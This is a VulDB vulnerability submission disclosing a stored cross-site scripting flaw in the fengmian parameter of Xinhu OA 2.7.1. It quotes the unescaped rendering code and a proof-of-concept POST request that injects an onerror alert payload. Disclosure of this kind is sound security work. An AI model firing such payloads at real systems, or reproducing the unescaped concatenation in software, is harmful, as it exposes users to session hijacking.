| タイトル | Xinhu Xinhu OA V2.7.1 (earlier versions may also be affected) Stored Cross-Site Scripting (XSS) |
|---|
| 説明 | Xinhu OA V2.7.1 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability within the "Notice and Announcement" (通知公告) module. The vulnerability exists in the rock_page_gong.php file, where the fengmian (cover image) parameter accepts user-supplied input without any security filtering or sanitization.
An attacker can inject a malicious XSS payload into a notice. When other users view the reminder information in the "Personal Center" (个人中心), the payload is executed in the user's browser. This could lead to session hijacking, unauthorized actions, or the execution of malicious code.
Advisory / Exploit
Vulnerability Point: Notice and Announcement - Add New Notice Trigger Point: Personal Center - Reminder Information - View
Vulnerable Code Snippet (rock_page_gong.php):
JavaScript
c.setcolumns('fengmian',{
renderer:function(v){
if(!v)return ' ';
// The variable 'v' is directly concatenated into the HTML string
return '<img src="'+v+'" height="60">';
}
});
Proof of Concept (POC): An attacker can submit the following POST request with a malicious payload in the fengmian parameter:
HTTP
POST /index.php?a=save&m=mode_news|input&d=flow&ajaxbool=true&rnd=98122 HTTP/1.1
Host: [Target_Host]
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie:
id=0&sxuanfileid=151&title=test&fengmian="x onerror="alert(1)"&typename=Security&...
The injected onerror event triggers the JavaScript execution when the image fails to load.
Company official website URL: http://www.rockoa.com/
Source code download address:http://www.rockoa.com/index.php?a=down&id=298 |
|---|
| ユーザー | BlackSpdier (UID 89912) |
|---|
| 送信 | 2025年12月28日 11:05 (4 月 ago) |
|---|
| モデレーション | 2026年01月04日 18:56 (7 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 339493 [Xinhu Rainrock RockOA 迄 2.7.1 Cover Image rock_page_gong.php fengmian クロスサイトスクリプティング] |
|---|
| ポイント | 17 |
|---|